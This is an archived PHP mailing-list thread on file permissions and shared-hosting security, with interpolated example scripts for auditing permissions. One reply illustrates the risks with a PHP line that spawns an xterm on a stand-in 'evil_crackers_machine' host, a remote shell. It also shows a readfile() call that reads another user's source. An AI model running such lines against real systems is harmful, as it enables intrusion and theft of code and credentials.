Re: [PHP] Need help with file permissions for PHP files

2005-04-17 Thread Rory Browne
> Two things Rory
>
> a. You only replied to me, instead of the list. You have to probably
> click on reply to all in your mail client. I have included the list's
> address for this reply, so that it will appear there.

Yeah sorry about that mailing you only thing. All the other lists I'm
subscribed to have the Reply-To field set so that replies are sent to the
list automatically, so I keep forgetting when I reply to this one to
'reply to all'. I'll probably try proxying the php mailing list
through my unix server, and set the Reply-To field manually. Any idea
how to do that with GMail?

> 2. Because it reads out of order.
Why?
Top posting is bad.
> III. Trimming is good, because it gets right to the point.

Top-posting/Bottom-posting matters when the emphasis is on presentation.
When you're simply trying to get a point across, then its level of
importance drops significantly.

Finally I was concentrating on saying what I felt was to be said. I
think a free-form discussion is much better than one where
top-posting / bottom-posting is more important than the actual
content of the message.

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] Need help with file permissions for PHP files

2005-04-17 Thread Ryan A
PLEASE let's not start on the.

> > 2. Because it reads out of order.
>
> Why?
>
> Top posting is bad.
>
> > III. Trimming is good, because it gets right to the point.


.top posting  / bottom posting thing again.

-Ryan





Re: [PHP] Need help with file permissions for PHP files

2005-04-17 Thread Rory Browne
Because now it's out of order. 

On 4/18/05, Ryan A [EMAIL PROTECTED] wrote:
> PLEASE let's not start on the.

Only Joking.

>
> > > 2. Because it reads out of order.
>

Why?

> > Why?
>
> > Top posting is bad.
>
> > > III. Trimming is good, because it gets right to the point.
>
> .top posting  / bottom posting thing again.
>

You should have sent that message before Jay sent his to me.


> -Ryan
 



RE: [PHP] Need help with file permissions for PHP files

2005-03-10 Thread Jay Blanchard
[snip]
The problem is that, in order for PHP to be able to access *.php 
files, the files must be in a directory with execute permission, and 
files themselves must have read permission. This makes my files open 
to reading by anyone, that is, anyone can look at my PHP source 
code, which I do not want.

The best I can do about it is to put those files in a directory with 
execute, but without read permission, that way the potential hacker 
can not know the names of my files, but he may be able to guess 
them! This is the first and most benign problem, but all following 
problems are more serious and have the same basis.

The website accesses mysql database, and PHP script caches some 
information into a cache.txt file. Since this PHP script must write 
to this file, the file has write permission. So, a potential hacker 
can write to cache file and make my website display erroneous 
information, or maybe even completely disable website.

The third problem is most severe. The PHP scripts from website 
connect to my mysql database. For security reasons database accepts 
only connections through local socket file. Again, the permissions 
are such that, if PHP script can access it, so can potential hacker, 
and he can also read password from PHP source, so a hacker has no 
trouble bringing my whole database down (well, he can not do that 
because of database access privileges, but he could do a lot of damage 
knowing all this).

Please help!
[/snip]

Then you need to go here http://shiflett.org and read about securing
your code. If you are worried about being hacked, and from your post it
seems that you may be excessively worried (what could you have that a
hacker would want that badly?) you need to do lots of reading on
securing your server, website, database, etc.




Re: [PHP] Need help with file permissions for PHP files

2005-03-10 Thread John Nichel
Kresimir Cosic wrote:
<snip>
Additional information (if that helps):
The website is located in directory home/vriho/public_html/
The mysql database is in home/vriho/db/mysql/ (not shared to other users)
The local socket file for mysql is at home/vriho/db/socket/
The parts of website that are hidden, including the cache file are at 
directory home/vriho/public_html/parts/
</snip>
Just looking at that, if you have to make your files world readable for 
them to work, your hosting provider doesn't have the box set up 
properly, and you should think about switching.  Basically, Apache 
should be using suexec to run as the user 'vriho' when serving up pages 
for your site.  All your files/directories should be owner/group 
'vriho', and should have no permissions for _other_.

--
John C. Nichel
ÜberGeek
KegWorks.com
716.856.9675
[EMAIL PROTECTED]
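
Added example (not part of the original thread): one way to check a site tree against the advice above, that everything is owned by the site user and carries no permissions for _other_. The function names are constructed for illustration; pass your own directory and owner.

```shell
#!/bin/sh
# Audit helpers for a per-user web tree served under suexec.
# Function names are hypothetical; directory and owner are supplied by the caller.

# Print every non-symlink path under DIR that grants r, w or x to "other".
# Symlinks are skipped: their own mode is always rwxrwxrwx and says
# nothing about the target.
list_other_access() {
    find "$1" ! -type l \( -perm -004 -o -perm -002 -o -perm -001 \) -print
}

# Print every path under DIR that is not owned by OWNER (name or numeric uid).
list_foreign_owner() {
    find "$1" ! -user "$2" -print
}

# Clear all "other" bits in place; owner and group bits are left untouched.
strip_other_access() {
    find "$1" ! -type l -exec chmod o-rwx {} +
}

# Return 0 only when nothing under DIR is exposed to "other" and
# everything belongs to OWNER.
tree_is_private() {
    [ -z "$(list_other_access "$1")" ] && [ -z "$(list_foreign_owner "$1" "$2")" ]
}
```

Run `list_other_access` first and review the output before `strip_other_access`: on a host without suexec, removing the _other_ bits also removes the web server's access.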


RE: [PHP] Need help with file permissions for PHP files

2005-03-10 Thread Jay Blanchard
[snip]
I think you have to face facts. There is no way you're going to have
your code secure against other users so long as it has to be readable
by apache.

One _PARTIAL_ solution: If like most linux distros, you have a group
called users, which contains every human user on the system, but
doesn't contain the apache user (nobody, apache, www, or something
else, depending on your sys.), you chmod your public_html directory to
701, and set group ownership to 'users'. This results in only you and
system users, being able to access the public_html directory. I
emphasise however that this is only a partial solution, since someone
can write a php script, along the lines of '<?php
readfile('/home/otheruser/public_html/file_that_I_want_to_read.php');
?>', which will give them access to anything they want to read, that
is readable by apache. I guess you could do something similar with
write permissions and cache.txt



To add insult to injury, if your host allows CGI/Perl, there is a
cgishell script available that presents a virtual shell over CGI, that
would run as the apache user. I've never tried it, but I can't really
see anything stopping something like <?php system('xterm --display
evil_crackers_machine'); ?>, or perhaps even something even simpler,
to get an ordinary shell running as the apache user. I guess safe_mode
would help get around some of these problems, but as is written on the
PHP docs, it's the wrong way to solve such a problem (although I'm not
totally sure what the right way is), and it requires admin access.

I guess you could run your own web-server, on a high-numbered port,
and then you can do all the securing you like, but if you aren't the
admin, and the admin doesn't like doing 'extra work' then you're out
of luck. If you are friends with the admin, you could possibly ask him
to install suexec, and run your security-sensitive scripts through
CGI, under your own UID.
[/snip]


Two things Rory

a. You only replied to me, instead of the list. You have to probably
click on reply to all in your mail client. I have included the list's
address for this reply, so that it will appear there.
2. Because it reads out of order.
   Why?
   Top posting is bad.
III. Trimming is good, because it gets right to the point.
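
Added example (not from the thread): a small model of how Unix picks exactly one permission class, which is why the `701` plus group `users` arrangement quoted above shuts out other shell users while still letting the web server user through. Function names and all uids/gids are constructed; root's bypass and ACLs are not modelled.

```shell
#!/bin/sh
# Model of classic Unix permission checks (no ACLs, no root bypass).
# All uids/gids passed to these functions are constructed sample values.

# effective_bits MODE FILE_UID FILE_GID PROC_UID "PROC_GIDS"
# Prints the single rwx triplet (0-7) that applies. Exactly one class is
# chosen: owner, else group, else other. A group member who is denied by
# the group bits does NOT fall through to the "other" bits.
effective_bits() {
    mode=$1; fuid=$2; fgid=$3; puid=$4; pgids=$5
    if [ "$puid" -eq "$fuid" ]; then
        echo $(( (0$mode >> 6) & 7 )); return 0
    fi
    for gid in $pgids; do
        if [ "$gid" -eq "$fgid" ]; then
            echo $(( (0$mode >> 3) & 7 )); return 0
        fi
    done
    echo $(( 0$mode & 7 ))
}

# can_read PROC_UID "PROC_GIDS" MODE:UID:GID...
# Every component but the last is a directory needing search (x=1);
# the last is the file itself and needs read (r=4).
can_read() {
    proc_uid=$1; proc_gids=$2; shift 2
    while [ $# -gt 0 ]; do
        m=${1%%:*}; rest=${1#*:}; u=${rest%%:*}; g=${rest#*:}
        bits=$(effective_bits "$m" "$u" "$g" "$proc_uid" "$proc_gids")
        if [ $# -gt 1 ]; then need=1; else need=4; fi
        [ $(( bits & need )) -ne 0 ] || return 1
        shift
    done
    return 0
}
```

With a directory `701:1001:100` and a file `644:1001:1001`, a user in gid 100 is refused at the directory, while a process outside that group (the web server user) passes. That second result is the limit of the partial solution: every script the server runs under that uid inherits the same access.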
